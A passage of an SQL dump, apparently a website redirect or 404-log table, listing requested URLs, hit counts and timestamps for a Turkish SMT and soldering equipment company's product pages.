00:00:00',301),(15160,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',525,0,'2017-12-02 17:25:29','0000-00-00 00:00:00',301),(15161,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',528,0,'2017-12-02 17:25:38','0000-00-00 00:00:00',301),(15162,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,`p`.product_sku',NULL,'','',514,0,'2017-12-02 17:25:54','0000-00-00 00:00:00',301),(15163,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',516,0,'2017-12-02 17:25:56','0000-00-00 00:00:00',301),(15164,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,category_name',NULL,'','',524,0,'2017-12-02 17:26:01','0000-00-00 00:00:00',301),(15165,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,category_name/dirdesc',NULL,'','',529,0,'2017-12-02 17:26:03','0000-00-00 00:00:00',301),(15166,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,mf_name',NULL,'','',515,0,'2017-12-02 17:26:08','0000-00-00 00:00:00',301),(15167,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,mf_name/dirdesc',NULL,'','',507,0,'2017-12-02 17:26:09','0000-00-00 00:00:00',301),(15168,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,pc.ordering,product_name',NULL,'','',504,0,'2017-12-02 17:26:16','0000-00-00 00:00:00',301),(15169,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',512,0,'2017-12-02 17:26:18','0000-00-00 00:00:00',301),(15170,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,product_name',NULL,'','',497,0,'2017-12-02 17:26:23','0000-00-00 00:00:00',301),(15171,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,product_name/dirdesc',NULL,'','',496,0,'2017-12-02 17:26:25','0000-00-00 00:00:00',301),(15172,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,mf_name',NULL,'','',507,0,'2017-12-02 17:26:26','0000-00-00 00:00:00',301),(15173,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',520,0,'2017-12-02 17:26:28','0000-00-00 00:00:00',301),(15174,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',507,0,'2017-12-02 17:26:33','0000-00-00 00:00:00',301),(15175,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',508,0,'2017-12-02 17:26:35','0000-00-00 00:00:00',301),(15176,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,product_name',NULL,'','',506,0,'2017-12-02 17:26:40','0000-00-00 00:00:00',301),(15177,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',504,0,'2017-12-02 17:26:41','0000-00-00 00:00:00',301),(15178,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/dirdesc',NULL,'','',518,0,'2017-12-02 17:26:47','0000-00-00 00:00:00',301),(15179,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,`p`.product_sku',NULL,'','',522,0,'2017-12-02 17:26:54','0000-00-00 00:00:00',301),(15180,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',529,0,'2017-12-02 17:26:56','0000-00-00 00:00:00',301),(15181,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,category_name',NULL,'','',523,0,'2017-12-02 17:27:01','0000-00-00 00:00:00',301),(15182,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',525,0,'2017-12-02 17:27:02','0000-00-00 00:00:00',301),(15183,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,mf_name',NULL,'','',524,0,'2017-12-02 17:27:08','0000-00-00 00:00:00',301),(15184,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',533,0,'2017-12-02 17:27:09','0000-00-00 00:00:00',301),(15185,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',532,0,'2017-12-02 17:27:14','0000-00-00 00:00:00',301),(15186,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',526,0,'2017-12-02 17:27:16','0000-00-00 00:00:00',301),(15187,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,product_name',NULL,'','',542,0,'2017-12-02 17:27:21','0000-00-00 00:00:00',301),(15188,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',534,0,'2017-12-02 17:27:23','0000-00-00 00:00:00',301),(15189,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/dirdesc',NULL,'','',536,0,'2017-12-02 17:27:28','0000-00-00 00:00:00',301),(15190,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux',NULL,'','',19,0,'2017-12-02 17:27:31','0000-00-00 00:00:00',301),(15191,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',550,0,'2017-12-02 17:27:35','0000-00-00 00:00:00',301),(15192,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',548,0,'2017-12-02 17:27:37','0000-00-00 00:00:00',301),(15193,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name',NULL,'','',536,0,'2017-12-02 17:28:00','0000-00-00 00:00:00',301),(15194,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,mf_name/dirdesc/results,1-40',NULL,'','',3,0,'2017-12-02 17:30:51','0000-00-00 00:00:00',301),(15195,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,mf_name/dirdesc/results,1-100',NULL,'','',1,0,'2017-12-02 18:34:41','0000-00-00 00:00:00',301),(15196,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/by,product_name?language=tr-tr',NULL,'','',24,0,'2017-12-02 18:43:19','0000-00-00 00:00:00',301),(15197,'http://www.3s-technologies.com.tr/en/home2/81-english-uk/english-content',NULL,'','',31,0,'2017-12-02 19:10:36','0000-00-00 00:00:00',301),(15198,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,mf_name/dirdesc',NULL,'','',1,0,'2017-12-02 19:13:14','0000-00-00 00:00:00',301),(15199,'http://www.3s-technologies.com.tr/en/products/manufacturers/kester',NULL,'','',28,0,'2017-12-02 19:26:16','0000-00-00 00:00:00',301),(15200,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,mf_name?language=tr-tr',NULL,'','',7,0,'2017-12-02 19:29:15','0000-00-00 00:00:00',301),(15201,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,product_sku?language=tr-tr',NULL,'','',17,0,'2017-12-02 19:42:44','0000-00-00 00:00:00',301),(15202,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh2-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-02 20:08:43','0000-00-00 00:00:00',301),(15203,'http://www.3s-technologies.com.tr/en/products/spr-20-detail?tmpl=component&print=1',NULL,'','',32,0,'2017-12-02 20:11:33','0000-00-00 00:00:00',301),(15204,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/stencil-washer-eco-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-12-02 20:15:52','0000-00-00 00:00:00',301),(15205,'http://www.3s-technologies.com.tr/index.php/en/products/955lc-37-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-12-02 20:15:53','0000-00-00 00:00:00',301),(15206,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/955lc-37-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-02 20:16:47','0000-00-00 00:00:00',301),(15207,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,category_name?language=tr-tr',NULL,'','',7,0,'2017-12-02 20:29:23','0000-00-00 00:00:00',301),(15208,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail',NULL,'','',14,0,'2017-12-02 20:50:02','0000-00-00 00:00:00',301),(15209,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-02 20:50:05','0000-00-00 00:00:00',301),(15210,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-12-02 21:24:43','0000-00-00 00:00:00',301),(15211,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',15,0,'2017-12-02 21:55:16','0000-00-00 00:00:00',301),(15212,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-02 22:12:30','0000-00-00 00:00:00',301),(15213,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_sku?language=en-gb',NULL,'','',24,0,'2017-12-02 22:53:58','0000-00-00 00:00:00',301),(15214,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/modules/content-modules/most-read/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',23,0,'2017-12-02 23:14:12','0000-00-00 00:00:00',301),(15215,'http://www.3s-technologies.com.tr/tr/images/xxu.php',NULL,'','',6,0,'2017-12-02 23:18:22','0000-00-00 00:00:00',301),(15216,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',231,0,'2017-12-02 23:23:11','0000-00-00 00:00:00',301),(15217,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/rl132-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-12-02 23:35:02','0000-00-00 00:00:00',301),(15218,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',8,0,'2017-12-03 00:30:23','0000-00-00 00:00:00',301),(15219,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,mf_name?language=en-gb',NULL,'','',25,0,'2017-12-03 01:12:10','0000-00-00 00:00:00',301),(15220,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_name?language=en-gb',NULL,'','',1,0,'2017-12-03 01:16:30','0000-00-00 00:00:00',301),(15221,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail',NULL,'','',24,0,'2017-12-03 01:37:49','0000-00-00 00:00:00',301),(15222,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/dirdesc/results,1-50',NULL,'','',16,0,'2017-12-03 02:01:39','0000-00-00 00:00:00',301),(15223,'http://www.3s-technologies.com.tr/en/products/manufacturer/dalga-lehim/by,product_name',NULL,'','',1,0,'2017-12-03 02:25:29','0000-00-00 00:00:00',301),(15224,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-03 02:26:59','0000-00-00 00:00:00',301),(15225,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',7,0,'2017-12-03 03:10:42','0000-00-00 00:00:00',301),(15226,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hä±z/by,product_sku',NULL,'','',2,0,'2017-12-03 03:43:33','0000-00-00 00:00:00',301),(15227,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/avf-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-12-03 04:29:09','0000-00-00 00:00:00',301),(15228,'http://3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/home-page-atomic/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',13,0,'2017-12-03 04:40:12','0000-00-00 00:00:00',301),(15229,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,mf_name?language=tr-tr',NULL,'','',13,0,'2017-12-03 04:40:14','0000-00-00 00:00:00',301),(15230,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/trident-detail/askquestion?tmpl=component',NULL,'','',28,0,'2017-12-03 04:47:32','0000-00-00 00:00:00',301),(15231,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/by,ordering',NULL,'','',1,0,'2017-12-03 04:53:32','0000-00-00 00:00:00',301),(15232,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',24,0,'2017-12-03 04:53:55','0000-00-00 00:00:00',301),(15233,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/dirdesc',NULL,'','',18,0,'2017-12-03 05:17:26','0000-00-00 00:00:00',301),(15234,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturers/ddm-novastar',NULL,'','',36,0,'2017-12-03 05:26:28','0000-00-00 00:00:00',301),(15235,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/results,1-20',NULL,'','',14,0,'2017-12-03 06:00:10','0000-00-00 00:00:00',301),(15236,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,mf_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-12-03 06:15:07','0000-00-00 00:00:00',301),(15237,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,mf_name/results,1-5',NULL,'','',10,0,'2017-12-03 06:40:09','0000-00-00 00:00:00',301),(15238,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,product_sku?language=tr-tr',NULL,'','',7,0,'2017-12-03 06:51:54','0000-00-00 00:00:00',301),(15239,'http://3s-technologies.com.tr/index.php/tr/anasayfa2/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',17,0,'2017-12-03 06:52:14','0000-00-00 00:00:00',301),(15240,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,product_name?language=en-gb',NULL,'','',24,0,'2017-12-03 06:54:48','0000-00-00 00:00:00',301),(15241,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/spr-20-detail/askquestion?tmpl=component',NULL,'','',30,0,'2017-12-03 07:36:13','0000-00-00 00:00:00',301),(15242,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',14,0,'2017-12-03 07:44:50','0000-00-00 00:00:00',301),(15243,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/jvk-detail',NULL,'','',13,0,'2017-12-03 07:48:47','0000-00-00 00:00:00',301),(15244,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',6,0,'2017-12-03 08:12:15','0000-00-00 00:00:00',301),(15245,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-03 09:03:23','0000-00-00 00:00:00',301),(15246,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/955lc-detail',NULL,'','',24,0,'2017-12-03 09:06:49','0000-00-00 00:00:00',301),(15247,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-03 09:17:55','0000-00-00 00:00:00',301),(15248,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic',NULL,'','',19,0,'2017-12-03 09:31:51','0000-00-00 00:00:00',301),(15249,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-03 09:49:54','0000-00-00 00:00:00',301),(15250,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',24,0,'2017-12-03 09:51:39','0000-00-00 00:00:00',301),(15251,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by,product_name/dirdesc?language=en-gb',NULL,'','',23,0,'2017-12-03 09:54:18','0000-00-00 00:00:00',301),(15252,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/stencil-washer-eco-detail/askquestion?tmpl=component',NULL,'','',23,0,'2017-12-03 10:08:48','0000-00-00 00:00:00',301),(15253,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',55,0,'2017-12-03 10:12:43','0000-00-00 00:00:00',301),(15254,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_name?language=en-gb',NULL,'','',2,0,'2017-12-03 10:24:09','0000-00-00 00:00:00',301),(15255,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-12-03 10:29:21','0000-00-00 00:00:00',301),(15256,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc/results,1-10',NULL,'','',4,0,'2017-12-03 10:40:09','0000-00-00 00:00:00',301),(15257,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,product_name/dirdesc?language=tr-tr',NULL,'','',6,0,'2017-12-03 10:48:03','0000-00-00 00:00:00',301),(15258,'http://3s-technologies.com.tr/en/products/245-sn63pb37-0.6mm-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-03 11:09:01','0000-00-00 00:00:00',301),(15259,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/ly-8c-detail/askquestion?tmpl=component',NULL,'','',170,0,'2017-12-03 11:21:23','0000-00-00 00:00:00',301),(15260,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',203,0,'2017-12-03 11:29:16','0000-00-00 00:00:00',301),(15261,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',23,0,'2017-12-03 11:42:23','0000-00-00 00:00:00',301),(15262,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/le-40v-detail?tmpl=component&print=1',NULL,'','',23,0,'2017-12-03 11:48:30','0000-00-00 00:00:00',301),(15263,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,mf_name',NULL,'','',39,0,'2017-12-03 11:56:23','0000-00-00 00:00:00',301),(15264,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',23,0,'2017-12-03 11:59:57','0000-00-00 00:00:00',301),(15265,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/dirdesc?language=en-gb',NULL,'','',29,0,'2017-12-03 12:03:01','0000-00-00 00:00:00',301),(15266,'http://www.3s-technologies.com.tr/index.php/en/products/e-bar-detail?tmpl=component&print=1',NULL,'','',23,0,'2017-12-03 12:07:04','0000-00-00 00:00:00',301),(15267,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/by,product_name/dirdesc',NULL,'','',2,0,'2017-12-03 12:13:17','0000-00-00 00:00:00',301),(15268,'http://3s-technologies.com.tr/en/products/dalga-lehim/mi-300-detail/askquestion?tmpl=component',NULL,'','',19,0,'2017-12-03 13:20:27','0000-00-00 00:00:00',301),(15269,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/rh2-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-12-03 13:46:01','0000-00-00 00:00:00',301),(15270,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,category_name?language=tr-tr',NULL,'','',31,0,'2017-12-03 13:58:56','0000-00-00 00:00:00',301),(15271,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,product_sku?error=404&language=en-gb',NULL,'','',1,0,'2017-12-03 14:18:47','0000-00-00 00:00:00',301),(15272,'http://www.3s-technologies.com.tr/tr/anasayfa/78-turkish-tr?format=feed&type=atom',NULL,'','',2,0,'2017-12-03 14:31:41','0000-00-00 00:00:00',301),(15273,'http://3s-technologies.com.tr/index.php/en/products/stencil-washer-eco-detail?tmpl=component&print=1',NULL,'','',15,0,'2017-12-03 14:37:36','0000-00-00 00:00:00',301),(15274,'http://www.3s-technologies.com.tr/index.php/en/products/spr-20-41-42-detail?tmpl=component&print=1',NULL,'','',23,0,'2017-12-03 16:23:28','0000-00-00 00:00:00',301),(15275,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',29,0,'2017-12-03 16:41:10','0000-00-00 00:00:00',301),(15276,'http://3s-technologies.com.tr/tr/urunler/screen-printer/spr-20-41-42-detail',NULL,'','',22,0,'2017-12-03 16:43:57','0000-00-00 00:00:00',301),(15277,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_sku',NULL,'','',2,0,'2017-12-03 16:52:58','0000-00-00 00:00:00',301),(15278,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,ordering?language=tr-tr',NULL,'','',25,0,'2017-12-03 16:53:56','0000-00-00 00:00:00',301),(15279,'http://3s-technologies.com.tr/en/products/stencil-washer-eco-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-03 16:57:01','0000-00-00 00:00:00',301),(15280,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',3,0,'2017-12-03 16:58:38','0000-00-00 00:00:00',301),(15281,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-12-03 17:02:02','0000-00-00 00:00:00',301),(15282,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/spr-20-41-detail',NULL,'','',1,0,'2017-12-03 17:03:58','0000-00-00 00:00:00',301),(15283,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/contacts-en',NULL,'','',7,0,'2017-12-03 17:06:18','0000-00-00 00:00:00',301),(15284,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/sp-18p-l-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-12-03 17:13:47','0000-00-00 00:00:00',301),(15285,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/aqueous',NULL,'','',2,0,'2017-12-03 17:22:49','0000-00-00 00:00:00',301),(15286,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-03 17:28:06','0000-00-00 00:00:00',301),(15287,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/mx200lp-detail/askquestion?tmpl=component',NULL,'','',176,0,'2017-12-03 17:29:25','0000-00-00 00:00:00',301),(15288,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/dirdesc?language=tr-tr',NULL,'','',28,0,'2017-12-03 17:31:16','0000-00-00 00:00:00',301),(15289,'http://3s-technologies.com.tr/tr/general/popup-pomo.php',NULL,'http://site.ru','',11,0,'2017-12-03 17:41:35','0000-00-00 00:00:00',301),(15290,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız',NULL,'','',86,0,'2017-12-03 17:43:59','0000-00-00 00:00:00',301),(15291,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name',NULL,'','',46,0,'2017-12-03 17:44:54','0000-00-00 00:00:00',301),(15292,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer',NULL,'','',20,0,'2017-12-03 17:50:57','0000-00-00 00:00:00',301),(15293,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-fırın/dirdesc',NULL,'','',489,0,'2017-12-03 17:52:03','0000-00-00 00:00:00',301),(15294,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',494,0,'2017-12-03 17:52:09','0000-00-00 00:00:00',301),(15295,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',510,0,'2017-12-03 17:52:10','0000-00-00 00:00:00',301),(15296,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,category_name',NULL,'','',499,0,'2017-12-03 17:52:15','0000-00-00 00:00:00',301),(15297,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',497,0,'2017-12-03 17:52:17','0000-00-00 00:00:00',301),(15298,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2017-12-03 17:56:28','0000-00-00 00:00:00',301),(15299,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/rh2-detail',NULL,'','',24,0,'2017-12-03 18:19:41','0000-00-00 00:00:00',301),(15300,'http://3s-technologies.com.tr/index.php/en/products/avf-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-03 18:35:34','0000-00-00 00:00:00',301),(15301,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim?language=en-gb',NULL,'','',24,0,'2017-12-03 18:36:32','0000-00-00 00:00:00',301),(15302,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',53,0,'2017-12-03 18:39:14','0000-00-00 00:00:00',301),(15303,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,category_name?language=en-gb',NULL,'','',1,0,'2017-12-03 18:51:30','0000-00-00 00:00:00',301),(15304,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',189,0,'2017-12-03 19:19:45','0000-00-00 00:00:00',301),(15305,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/results,1-20',NULL,'','',7,0,'2017-12-03 19:29:29','0000-00-00 00:00:00',301),(15306,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/dirdesc/results,1-5',NULL,'','',8,0,'2017-12-03 20:08:24','0000-00-00 00:00:00',301),(15307,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,mf_name?language=tr-tr',NULL,'','',24,0,'2017-12-03 20:14:07','0000-00-00 00:00:00',301),(15308,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/jv131-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-03 20:19:37','0000-00-00 00:00:00',301),(15309,'https://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,product_name?language=en-gb',NULL,'','',1,0,'2017-12-03 20:49:46','0000-00-00 00:00:00',301),(15310,'http://3s-technologies.com.tr/index.php/tr/ueruenler/cs40-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-03 20:55:15','0000-00-00 00:00:00',301),(15311,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/dirdesc/results,1-5',NULL,'','',5,0,'2017-12-03 20:57:03','0000-00-00 00:00:00',301),(15312,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/rh6-400x300_250x250.jpg',NULL,'','',1,0,'2017-12-03 21:16:41','0000-00-00 00:00:00',301),(15313,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,product_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-03 21:31:25','0000-00-00 00:00:00',301),(15314,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku?language=en-gb',NULL,'','',24,0,'2017-12-03 21:32:16','0000-00-00 00:00:00',301),(15315,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-03 21:35:58','0000-00-00 00:00:00',301),(15316,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh2-20-detail/askquestion?tmpl=component',NULL,'','',27,0,'2017-12-03 21:42:55','0000-00-00 00:00:00',301),(15317,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,product_name?language=tr-tr',NULL,'','',29,0,'2017-12-03 22:12:20','0000-00-00 